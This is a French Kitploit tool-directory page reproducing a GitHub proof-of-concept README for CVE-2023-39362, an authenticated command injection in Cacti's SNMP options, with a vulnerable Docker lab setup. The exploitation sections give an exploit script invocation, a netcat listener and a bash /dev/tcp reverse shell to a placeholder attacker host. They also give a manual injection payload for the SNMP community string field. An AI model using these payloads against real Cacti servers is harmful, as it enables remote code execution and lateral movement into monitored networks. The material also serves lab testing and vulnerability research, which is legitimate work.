Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-39362-cacti-snmp-command-injection-poc — Preuve de concept pour CVE-2023-39362, une injection de commande authentifiée dans les options SNMP de Cacti. Comprend un environnement Docker vulnérable pour les tests et un script Python pour l'exploitation automatisée avec capacité de reverse shell. | Kitploit
Outils/GitHubGitHub/jakabakos/cve-2023-39362-cacti-snmp-command-injection-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingLabs et Pratique
GitHubjakabakos/cve-2023-39362-cacti-snmp-command-injection-poc

CVE-2023-39362-cacti-snmp-command-injection-poc

Preuve de concept pour CVE-2023-39362, une injection de commande authentifiée dans les options SNMP de Cacti. Comprend un environnement Docker vulnérable pour les tests et un script Python pour l'exploitation automatisée avec capacité de reverse shell.

Voir le dépôt
24il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité d'injection de commande dans Cacti (CVE-2023-39362) - PoC

Ce dépôt est un fork de ce dépôt : https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti est un cadre open-source de surveillance opérationnelle et de gestion des pannes, en constante évolution pour répondre aux besoins dynamiques de sa communauté d'utilisateurs.

Dans la version 1.2.24, une vulnérabilité de sécurité potentielle marquée comme CVE-2023-39362 a été identifiée. Dans des conditions spécifiques, un utilisateur privilégié authentifié peut exploiter une faille dans les options SNMP d'un Device, en utilisant une chaîne malveillante qui conduit à une injection de commande. Cette exploitation entraîne l'exécution authentifiée de code à distance sur le serveur sous-jacent.

CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362

Les implications de cette vulnérabilité sont graves, car un acteur malveillant disposant de privilèges authentifiés pourrait compromettre l'intégrité du serveur hébergeant Cacti. Cette compromission pourrait potentiellement servir de passerelle pour un accès non autorisé à d'autres hôtes du réseau, en particulier ceux surveillés par Cacti.

Ceci est une application vulnérable pour tester l'exploit de la vulnérabilité Cacti (CVE-2023-39362).

ATTENTION !

Cette application contient de graves vulnérabilités de sécurité. Utilisez-la à vos risques et périls ! Il est recommandé d'utiliser un environnement sauvegardé et isolé (comme une VM avec un instantané récent et un réseau hôte uniquement). Ne téléchargez pas cette application sur des serveurs exposés à Internet, car ils seront compromis.

Avertissement

Je décline toute responsabilité quant à l'utilisation de cette application. Le seul but de cette application est d'être un scénario de test pour l'exploit CVE-2023-39362 et elle ne doit pas être utilisée de manière malveillante. Si votre serveur est compromis via une installation de cette application, ce n'est pas ma responsabilité, mais celle de la ou des personnes qui l'ont téléchargée et installée.**

Utilisation

1. Configurer l'environnement

Voici les étapes pour configurer l'environnement :

  1. Lancez docker compose up -d pour démarrer la composition.
  2. Vous pouvez finaliser les étapes en naviguant vers http://127.0.0.1/cacti pour démarrer l'assistant d'initialisation de Cacti. Si vous obtenez une erreur concernant la base de données, attendez un peu et rafraîchissez la page.
  3. Les identifiants par défaut sont admin/admin.
  4. Appuyez sur 'Suivant' pour tous les boutons pendant l'assistant, en choisissant les options en conséquence. Tous les paramètres par défaut devraient convenir et toutes les conditions préalables obligatoires devraient être satisfaites.
  5. Après l'installation, connectez-vous en tant qu'admin.
  6. Allez dans 'Console' > 'Configuration' > 'Utilisateur'.
  7. Cliquez sur l'utilisateur guest.
  8. 'Activez'-le, définissez un mot de passe, désactivez 'Doit changer le mot de passe à la prochaine connexion' si vous le souhaitez.
  9. Cliquez sur le bouton 'Enregistrer'.
  10. Allez dans la section 'Permissions'.
  11. Sous 'Administration générale', activez 'Accès à la console' et 'Sites/Appareils/Données'.
  12. Cliquez sur le bouton 'Enregistrer'.
  13. Déconnectez-vous et reconnectez-vous en tant que guest pour essayer l'exploit.

Le guide d'installation officiel de Cacti peut être trouvé ici.

Pour démonter l'environnement, utilisez la commande docker compose down.

2. Exécuter le script d'exploit

(Ceci n'est qu'un chemin possible pour l'exploitation )

Exécutez la commande sur le serveur distant :

root@kitploit:~
python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd touch /tmp/proof

Ouverture d'un shell inversé :

root@kitploit:~
nc -lvnp 4242

python3 exploit.py --url http://localhost -u guest -p Sup3rS3cr3tPassword.1234 --cmd 'bash -c "exec bash -i &>/dev/tcp/ATTACKER_IP/PORT <&1"'

3. Exploitation manuelle

  1. Allez dans 'Console' > 'Créer' > 'Nouvel Appareil'.
  2. Créez un Appareil qui supporte SNMP version 1 ou 2.
  3. Assurez-vous que l'Appareil a des Graphiques avec un ou plusieurs modèles de :
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (La création de l'Appareil à partir du modèle 'Net-SNMP Device' satisfera la condition préalable des Graphiques)
  4. Dans les 'Options SNMP', pour le champ 'Chaîne de communauté SNMP', utilisez une valeur comme celle-ci : public\' ; touch /tmp/proof ; \'.
  5. Cliquez sur le bouton 'Créer'.
  6. Vérifiez sous /tmp la présence du fichier créé.

Pour obtenir un shell inversé, une charge utile comme celle-ci peut être utilisée.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Cause racine

Une analyse détaillée de la cause racine de la vulnérabilité est disponible dans l'avis de sécurité original ou sur le billet de blog de l'auteur original.

Auteurs

  • Antonio Francesco Sardella - rapporteur de vulnérabilité - m3ssap0
  • Akos Jakab - automatisation de l'exploitation via un script Python - jakabakos

Licence

Ce projet est sous licence Unlicense - voir le fichier LICENSE pour plus de détails.

Télécharger l’outil